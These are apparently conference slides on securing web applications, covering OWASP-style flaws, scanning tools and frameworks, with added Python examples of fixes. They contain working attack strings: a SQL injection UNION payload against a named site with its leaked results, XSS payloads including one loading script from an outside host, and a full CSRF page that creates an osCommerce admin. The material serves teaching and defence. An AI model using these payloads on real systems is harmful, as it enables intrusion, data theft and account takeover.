Securing Your Company’s Web Presence
Russ McRee, Microsoft
Holisticinfosec.org
ISACA Puget Sound Meeting
3/16/2010
Common security threats to your web presence and what you can do about it
Agenda
• Understand the current state of security in the Web 2.0 world
• Common vulnerabilities and how easily attackers exploit them
• Review common tools available for developers, auditors, managers and security assessors
• Use frameworks (such as OWASP) to assess and prevent common vulnerabilities
State of the Web 2.0 Union
• 83% of websites have had at least one serious vulnerability
• 64% of websites currently have at least one serious vulnerability
• 61% of serious vulnerabilities have been resolved; 8,902 (39%) remain unresolved
• Average # of serious severity unresolved vulnerabilities per website: 6.5
Source: WhiteHat Security
State of the Web 2.0 Union
• Web malware: Gumblar
– Gumblar is a botnet that compromises web servers and then infects visitors to the compromised sites, installing malware on their PCs that redirects the users’ Google searches to fraudulent web sites. It also harvests FTP credentials from the infected PC and uses them to compromise additional web sites.
• Malicious online advertisements: malicious advertisers purchase ad time in online ad streams or compromise existing ad aggregators
Source: WhiteHat Security
Common vulns and ease of exploit: OWASP Top 10
Source: OWASP Top 10
Common vulns and ease of exploit: 2010 CWE/SANS Top 25 Most Dangerous Programming Errors
• Injection
– SQL, OS and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query.
– The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
Source: OWASP Top 10
Common vulns and ease of exploit
• SQL injection
– Good:
• http://festivalbar.it.msn.com/news/index.php?id=2
– Not good at all:
• http://festivalbar.it.msn.com/news/index.php?id=-1 union select 1,concat_ws(0x3a,user(),@@version,database()),3,4,5,6,7,8,9,10,11--
– The id value is pasted into the query unescaped. id=-1 matches no row, the UNION SELECT appends an attacker-chosen row with the same number of columns (11) as the original query, and concat_ws(0x3a, ...) joins user(), @@version and database() with ":" into the one column the page renders. What came back:
– User = FBAR_FB002
– Host private IP = 192.168.111.119
– MySQL version = 4.1.22
– Database = FBAR_WWW
Common vulns and ease of exploit
SQL injection video demo
festivalbar.it.msn.com
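To show the mechanics behind the festivalbar URL, here is an added example (mine, not the slides’ or the site’s code). It assumes the page reads one row from a news table by numeric id, and uses SQLite in place of MySQL: since SQLite has no user(), @@version or database(), sqlite_version() stands in for them. The vulnerable function concatenates the id into the SQL text exactly as the slide describes; the parameterised version sends the value separately and the same payload matches nothing.

```python
import sqlite3

# Added example; assumption: a "news" table with id, title, body behind index.php?id=...


def make_db():
    """Constructed sample data standing in for the site's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(1, "Opening night", "Doors open at 20:00"),
         (2, "Line-up announced", "Full list on the site")],
    )
    conn.commit()
    return conn


def fetch_news_vulnerable(conn, news_id):
    """The bug behind the 'not good at all' URL: the id parameter is
    concatenated into the SQL text, so the attacker rewrites the query."""
    sql = "SELECT id, title, body FROM news WHERE id=" + news_id
    return conn.execute(sql).fetchall()


def fetch_news_safe(conn, news_id):
    """Parameterised query: the value travels separately from the SQL text,
    so the whole payload is compared as one literal and matches no row."""
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id=?", (news_id,)
    ).fetchall()


# SQLite analogue of the slide's payload. The UNION must supply as many
# columns as the original SELECT: 3 here, 11 on the festivalbar page,
# which is why that URL carries the placeholders 1..11.
PAYLOAD = "-1 union select 1, 'version:' || sqlite_version(), 3 --"


def demo():
    """Returns (what leaks from the vulnerable query, what the safe query
    returns for the same payload, what the safe query returns for id=2)."""
    conn = make_db()
    leaked = fetch_news_vulnerable(conn, PAYLOAD)
    blocked = fetch_news_safe(conn, PAYLOAD)
    normal = fetch_news_safe(conn, "2")
    return leaked, blocked, normal


if __name__ == "__main__":
    leaked, blocked, normal = demo()
    print("vulnerable:    ", leaked)    # one row whose title is the DB version
    print("parameterised: ", blocked)   # []
    print("normal lookup: ", normal)    # the id=2 row
```

The same fix applies to the PHP original: bind id as a parameter (or at minimum cast it to an integer before it reaches the query) rather than interpolating it into the SQL string.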
Common vulns and ease of exploit
• Cross-site scripting (XSS)
– XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping
– XSS allows attackers to execute script in the victim’s browser, which can hijack user sessions, deface web sites or redirect the user to malicious sites
Source: OWASP Top 10
Common vulns and ease of exploit
• Cross-site scripting (XSS)
– Good
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b604491e163632
– Bad
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script>alert(document.cookie)</script>4491e163632
– Really bad
• http://192.168.248.102/eclime-1.0.9b/catalog/advanced_search_result.php?keywords=Hdmi81b60<script src=http://holisticinfosec.org/js/warning.js></script>4491e163632
Common vulns and ease of exploit
XSS video demo
eclime 1.0.9b (osCommerce fork)
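An added example (mine, not eclime’s code) of the reflection bug and its fix. It assumes the search page echoes the keywords parameter twice, once into a heading and once back into the search box’s value attribute; the second spot matters because an attacker can break out of an attribute without typing a single < or >. The constructed attribute payload is mine; the script payload is the slide’s.

```python
import html

# Added example; assumption: keywords is echoed into a heading and an attribute.

# The slide's "bad" payload, plus a constructed one aimed at the attribute
# context that needs no angle brackets at all.
SCRIPT_PAYLOAD = "Hdmi81b60<script>alert(document.cookie)</script>4491e163632"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_results_vulnerable(keywords):
    """The eclime pattern: untrusted input pasted into the page unchanged."""
    return (
        f"<h2>Results for {keywords}</h2>\n"
        f'<input type="text" name="keywords" value="{keywords}">'
    )


def render_results_safe(keywords):
    """Escape for the context the value lands in. html.escape turns < > & into
    entities; quote=True also encodes " and ', which is what stops the
    attribute payload from closing value="" early."""
    safe = html.escape(keywords, quote=True)
    return (
        f"<h2>Results for {safe}</h2>\n"
        f'<input type="text" name="keywords" value="{safe}">'
    )


def has_live_script(rendered):
    """Check used by the demo: a <script> tag or a raw onfocus handler the
    browser would run. Deliberately narrow; it is not a general XSS filter."""
    lowered = rendered.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
        print("vulnerable executes:", has_live_script(render_results_vulnerable(payload)))
        print("safe executes:      ", has_live_script(render_results_safe(payload)))
        print(render_results_safe(payload))
        print()
```

Escaping is context-specific: html.escape is right for element content and quoted attributes, but a value placed inside a JavaScript block, a URL or a CSS rule needs that context’s encoding instead.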
Common vulns and ease of exploit
• Cross-site request forgery (CSRF)
– A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other authentication information, to a vulnerable web application
– This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim
Source: OWASP Top 10
Common vulns and ease of exploit
• Cross-site request forgery (the attacker’s page; an administrator who visits it while logged in gets a new admin user created)
<html>
<form name="createID" action="http://192.168.248.102/oscommerce/catalog/admin/administrators.php?action=insert" method="post" autocomplete="off">
  <input type="hidden" name="username" value="frank">
  <input type="hidden" name="password" value="test">
  <input type="hidden" name="x" value="">
  <input type="hidden" name="y" value="">
</form>
<script>
window.setTimeout(function() {
  document.createID.submit();
}, 3000);
</script>
<h1>Adding an osCommerce admin user...</h1>
</html>
Common vulns and ease of exploit
CSRF video demo
osCommerce
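The forged form works because administrators.php accepts any POST that arrives with the admin’s session cookie. The added example below (mine, not osCommerce’s code) shows the server side of the fix: a synchronizer token bound to the session plus an origin check. It assumes the handler receives the session id from the cookie, the POST fields as a dict and the request headers as a dict, and that the admin site lives at the origin in the slide’s URL. The forged form carries only username, password, x and y, so it is refused.

```python
import hashlib
import hmac
import secrets

# Added example; assumptions: session id from the cookie, form fields and
# headers as dicts, admin site at the origin from the slide's URL.
SECRET_KEY = secrets.token_bytes(32)   # server-side only, never sent to a browser
TRUSTED_ORIGIN = "http://192.168.248.102"


def issue_csrf_token(session_id):
    """Synchronizer token bound to the session. An HMAC over the session id
    means nothing extra to store, and an attacker's page cannot compute it
    because it never sees SECRET_KEY."""
    return hmac.new(SECRET_KEY, b"csrf:" + session_id.encode(), hashlib.sha256).hexdigest()


def _same_origin(headers):
    """Independent second check: when the browser sends Origin or Referer, a
    request built on an attacker's page reveals where it came from. If the
    header is absent (older browsers, privacy settings) fall through to the
    token check rather than refusing."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return True
    return source == TRUSTED_ORIGIN or source.startswith(TRUSTED_ORIGIN + "/")


def handle_insert(session_id, form, headers):
    """administrators.php?action=insert with CSRF defences added.
    Returns (status, message)."""
    if not session_id:
        return 401, "not logged in"
    if not _same_origin(headers):
        return 403, "cross-origin request refused"
    supplied = form.get("csrf_token", "")
    # constant-time comparison so the token cannot be guessed byte by byte
    if not hmac.compare_digest(supplied, issue_csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    return 200, "created admin user " + form["username"]


if __name__ == "__main__":
    session = "sess-123"
    forged = {"username": "frank", "password": "test", "x": "", "y": ""}
    print(handle_insert(session, forged, {"Origin": "http://attacker.example"}))
    print(handle_insert(session, forged, {}))
    legit = dict(forged, csrf_token=issue_csrf_token(session))
    print(handle_insert(session, legit, {"Origin": TRUSTED_ORIGIN}))
```

The legitimate admin form must carry the token as a hidden field (value=issue_csrf_token(session_id)) so the real page passes the check; the attacker’s page cannot read that value across origins, which is the whole point.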
Common tools – commercial
• Acunetix WVS by Acunetix
• AppScan by IBM
• Burp Suite Professional by PortSwigger
• Hailstorm by Cenzic
• MileScan Web Security Auditor by MileSCAN Technologies
• N-Stalker by N-Stalker
• NetSparker by Mavituna Security
• NeXpose by Rapid7
• NTOSpider by NTObjectives
• Retina Web Security Scanner by eEye Digital Security
• SecurityQA Toolbar by iSEC Partners
• WebApp360 by nCircle
• WebInspect by HP
Source: WASC Scanner List. Legend: tools I’ve used
Common tools – SaaS
• AppScan OnDemand by IBM
• ClickToSecure by Cenzic
• QualysGuard Web Application Scanning by Qualys
• Sentinel by WhiteHat
• Veracode Web Application Security by Veracode
• WebInspect by HP
Source: WASC Scanner List. Legend: tools I’ve used
Common tools – Free/Open Source
• Burp Suite by PortSwigger
• Grabber by Romain Gaucher
• Grendel-Scan by David Byrne and Eric Duprey
• Nikto/Wikto
• Paros by Chinotec
• Powerfuzzer by Marcin Kozlowski
• SecurityQA Toolbar by iSEC Partners
• TamperData
• W3AF by Andres Riancho
• Wapiti by Nicolas Surribas
• Watcher & Fiddler
Source: WASC Scanner List. Legend: tools I’ve used
Tools – Burp & Tamper Data
Burp or Tamper Data demo
Frameworks
• Audit against OWASP Top 10 and CWE/SANS Top 25
• Now balance those against compliance requirements
• You’re the auditors, you tell me ;-)
– PCI
– HIPAA
– SOX
– GLBA
Frameworks
• Security Development Lifecycle (SDL)
– Incorporates comprehensive security and privacy protections for online services and web applications. Includes requirements that address widely exploited classes of web vulnerabilities, including XSS, SQL injection and CSRF, among others.
• Applies to large, medium and small organizations
• Applies to various development methodologies
• Applies to any platform
Frameworks
• SDL Threat Modeling
– Classic software threat modeling
– Infrastructure threat modeling
Resources
• OWASP Top 10
– http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• 2010 CWE/SANS Top 25 Most Dangerous Programming Errors
– http://cwe.mitre.org/top25/
• 8th WhiteHat Website Security Statistics Report
– http://www.slideshare.net/jeremiahgrossman/whitehat-security-8th-website-security-statistics-report-2494163
Resources
• SDL
– http://www.microsoft.com/security/sdl/default.aspx
• Infrastructure Threat Modeling
– http://technet.microsoft.com/en-us/library/dd941826.aspx
• SDL Threat Modeling Tool
– http://www.microsoft.com/downloads/details.aspx?FamilyID=A48CCCB1-814B-47B6-9D17-1E273F65AE19&displayLang=en
• Toolsmith
– http://holisticinfosec.org/content/view/12/26/
Resources
• WebGoat
– http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Russ McRee
russ at holisticinfosec dot org
rmcree at microsoft dot com
QUESTIONS?